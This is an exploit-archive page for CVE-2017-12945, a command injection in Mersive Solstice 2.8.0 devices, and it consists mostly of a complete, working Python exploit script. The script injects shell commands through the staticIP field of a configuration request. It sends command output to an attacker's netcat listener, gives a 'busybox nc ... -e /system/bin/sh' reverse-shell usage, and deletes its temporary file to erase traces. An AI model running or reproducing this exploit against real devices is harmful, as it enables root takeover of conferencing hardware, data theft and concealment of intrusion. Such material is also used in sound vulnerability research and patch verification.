Mersive Solstice 2.8.0 Remote Code Execution

2019.11.29
Credit: Alexandre Teyar
Risk: High
Local: No
Remote: Yes
CVE: CVE-2017-12945
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution # Google Dork: N/A # Date: 2016-12-23 # Exploit Author: Alexandre Teyar # Vendor Homepage: https://www2.mersive.com/ # Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk # Versions: 2.8.0 # Tested On: Mersive Solstice 2.8.0 # CVE: CVE-2017-12945 # Description : This will exploit an (authenticated) blind OS command injection # vulnerability present in Solstice devices running versions # of the firmware prior to 2.8.4. # Notes : To get the the command output (in piped-mode), a netcat listener # (e.g. 'nc -lkvp <LPORT>') needs to be launched before # running the exploit. # To get an interactive root shell use the following syntax # 'python.exe .\CVE-2017-12945.py -pass <PASSWORD> # -rh <RHOST> -p "busybox nc <LHOST> <LPORT> # -e /system/bin/sh -i"'. #!/usr/bin/env python3 import argparse import logging import requests import sys import time def parse_args(): """ Parse and validate the command line supplied by users """ parser = argparse.ArgumentParser( description="Solstice Pod Blind Command Injection" ) parser.add_argument( "-d", "--debug", dest="loglevel", help="enable verbose debug mode", required=False, action="store_const", const=logging.DEBUG, default=logging.INFO ) parser.add_argument( "-lh", "--lhost", dest="lhost", help="the listening address", required=False, type=str ) parser.add_argument( "-lp", "--lport", dest="lport", help="the listening port - default 4444", required=False, default="4444", type=str ) parser.add_argument( "-p", "--payload", dest="payload", help="the command to execute", required=True, type=str ) parser.add_argument( "-pass", "--password", dest="password", help="the target administrator password", required=False, default="", type=str ) parser.add_argument( "-rh", "--rhost", dest="rhost", help="the target address", required=True, type=str ) return parser.parse_args() def main(): try: args = parse_args() lhost = args.lhost lport = args.lport password = args.password rhost = args.rhost logging.basicConfig( datefmt="%H:%M:%S", format="%(asctime)s: %(levelname)-8s %(message)s", handlers=[logging.StreamHandler()], level=args.loglevel ) # Redirect stdout and stderr to <FILE> # only when the exploit is launched in piped mode if lhost and lport: payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1" logging.info( "attacker listening address: {}:{}".format(lhost, lport) ) else: payload = args.payload logging.info("solstice pod address: {}".format(rhost)) if password: logging.info( "solstice pod administrator password: {}".format(password) ) # Send the payload to be executed logging.info("sending the payload...") send_payload(rhost, password, payload) # Send the results of the payload execution to the attacker # using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE> if lhost and lport: payload = ( "busybox nc {} {} < /data/local/tmp/rce.tmp ".format( lhost, lport ) ) logging.info("retrieving the results...") send_payload(rhost, password, payload) # Erase exploitation traces payload = "rm -f /data/local/tmp/rce.tmp" logging.info("erasing exploitation traces...") send_payload(rhost, password, payload) except KeyboardInterrupt: logging.warning("'CTRL+C' pressed, exiting...") sys.exit(0) def send_payload(rhost, password, payload): URL = "http://{}/Config/service/saveData".format(rhost) headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "Referer": "http://{}/Config/config.html".format(rhost) } data = { "m_networkCuration": { "ethernet": { "dhcp": False, "staticIP": "; {}".format(payload), "gateway": "", "prefixLength": 24, "dns1": "", "dns2": "" } }, "password": "{}".format(password) } # Debugging using the BurpSuite # proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'https://127.0.0.1:8080' # } try: logging.info("{}".format(payload)) response = requests.post( URL, headers=headers, # proxies=proxies, json=data ) logging.debug( "{}".format(response.json()) ) # Wait for the command to be executed time.sleep(2) except requests.exceptions.RequestException as ex: logging.error("{}".format(ex)) sys.exit(0) if __name__ == "__main__": main()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top